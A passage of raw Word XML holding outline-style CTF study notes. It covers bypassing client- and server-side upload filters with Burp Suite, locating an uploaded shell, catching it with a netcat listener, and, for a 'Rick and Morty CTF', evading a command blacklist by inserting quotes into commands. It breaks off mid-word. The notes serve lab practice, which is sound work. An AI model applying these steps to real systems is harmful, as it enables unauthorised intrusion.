          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Confirm Client-Side Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3386E3" w14:textId="0959765B" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Extension requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481E3189" w14:textId="22107D02" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercept Client Request (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D988945" w14:textId="0FD6E025" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Remove File Extension Filter in Intercept Client Requests (^</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>$|)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4161B313" w14:textId="6744A77F" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CTRL-F5 when refreshing page to clear cache so JS will not be saved and preloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDAA999" w14:textId="199EA590" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Will require Server to re-send Upload Filter Script, which can be intercepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584A873" w14:textId="4C4C22BB" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find upload.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDD46AA" w14:textId="1B145D98" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Do Intercept Server Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775758E5" w14:textId="7642387C" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Will Catch JS Script for Client-Side </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="657DEF92" w14:textId="0825FDBD" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Yoink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> out Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483F5A8" w14:textId="295E435C" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Re-Attempt Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204AE343" w14:textId="1F53D470" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Will fail if Server-Side Filter is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E098C4D" w14:textId="5571B2F2" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Since Client-Side used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EAE009" w14:textId="542011FC" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5EE00A" w14:textId="03EDFF21" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6142FE" w14:textId="0A0755A1" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Magic Numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CC3CC" w14:textId="35C1A0A3" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>What is left?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603C63D5" w14:textId="2FF2C47B" w:rsidR="00CD4C9E" w:rsidRPr="0084205E" w:rsidRDefault="00CD4C9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MIME type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6880DF" w14:textId="36F1CD0B" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Change file type to match extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7553FB61" w14:textId="6E7ACDAD" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AFTER SUCCESSFUL BYPASS OF FILTERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78315783" w14:textId="688B1125" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Re-do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> search for jpgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1DA3E4" w14:textId="7CAC3EE7" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Compare output with first scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F60DDD" w14:textId="2E5C63AA" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>New File added will be Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433704A1" w14:textId="023BEDB4" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Setup netcat listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501AC98A" w14:textId="2CEBB8D9" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Go to admin page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1F36E5" w14:textId="14D3932D" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Input file path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C1D022" w14:textId="5FB628EA" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/content/&lt;filename&gt;/.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4C8F3E" w14:textId="481E31C6" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B843BCC" w14:textId="7169B611" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Connection should be made</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7A9E9C" w14:textId="39CCABE4" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB2B28" w14:textId="3F16432E" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hostname -I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C1446" w14:textId="4A59F947" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F3B0320" w14:textId="3A303A84" w:rsidR="001D5218" w:rsidRPr="0084205E" w:rsidRDefault="001D5218" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Navigate and find flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741AB8C" w14:textId="6CE1D5F3" w:rsidR="008F4333" w:rsidRPr="0084205E" w:rsidRDefault="008F4333" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D061F2E" w14:textId="073A2B88" w:rsidR="008F4333" w:rsidRPr="0084205E" w:rsidRDefault="00085118" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rick and Morty CTF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604A9071" w14:textId="5DA4AC8A" w:rsidR="008B3C26" w:rsidRPr="0084205E" w:rsidRDefault="008B3C26" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Curl “http://&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C0373" w14:textId="45274883" w:rsidR="00085118" w:rsidRPr="0084205E" w:rsidRDefault="00085118" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inspect Element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F159173" w14:textId="4EBD6E47" w:rsidR="00085118" w:rsidRPr="0084205E" w:rsidRDefault="00085118" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C7A73" w14:textId="5A4567D6" w:rsidR="00085118" w:rsidRPr="0084205E" w:rsidRDefault="00085118" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Explore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E589E9" w14:textId="3CDD1B90" w:rsidR="00085118" w:rsidRPr="0084205E" w:rsidRDefault="00085118" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Try different extensions of files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09774925" w14:textId="3FCAB88C" w:rsidR="00085118" w:rsidRPr="0084205E" w:rsidRDefault="00085118" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Less, more commands in addition to cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16A7AD" w14:textId="021B7475" w:rsidR="004D43EE" w:rsidRPr="0084205E" w:rsidRDefault="004D43EE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Blacklisted command &gt; grep -R “”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F6B37" w14:textId="39F3F6D9" w:rsidR="004D43EE" w:rsidRPr="0084205E" w:rsidRDefault="004D43EE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inspect source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51C6DC" w14:textId="58A188DA" w:rsidR="00CC0AD7" w:rsidRPr="0084205E" w:rsidRDefault="00CC0AD7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypass blacklisted command by using a string in the middle of a command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480C0769" w14:textId="17C3754F" w:rsidR="00CC0AD7" w:rsidRPr="0084205E" w:rsidRDefault="00CC0AD7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="407810F2" w14:textId="1D079792" w:rsidR="00CC0AD7" w:rsidRPr="0084205E" w:rsidRDefault="00CC0AD7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Cat vs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>c”a</w:t>
      </w:r>
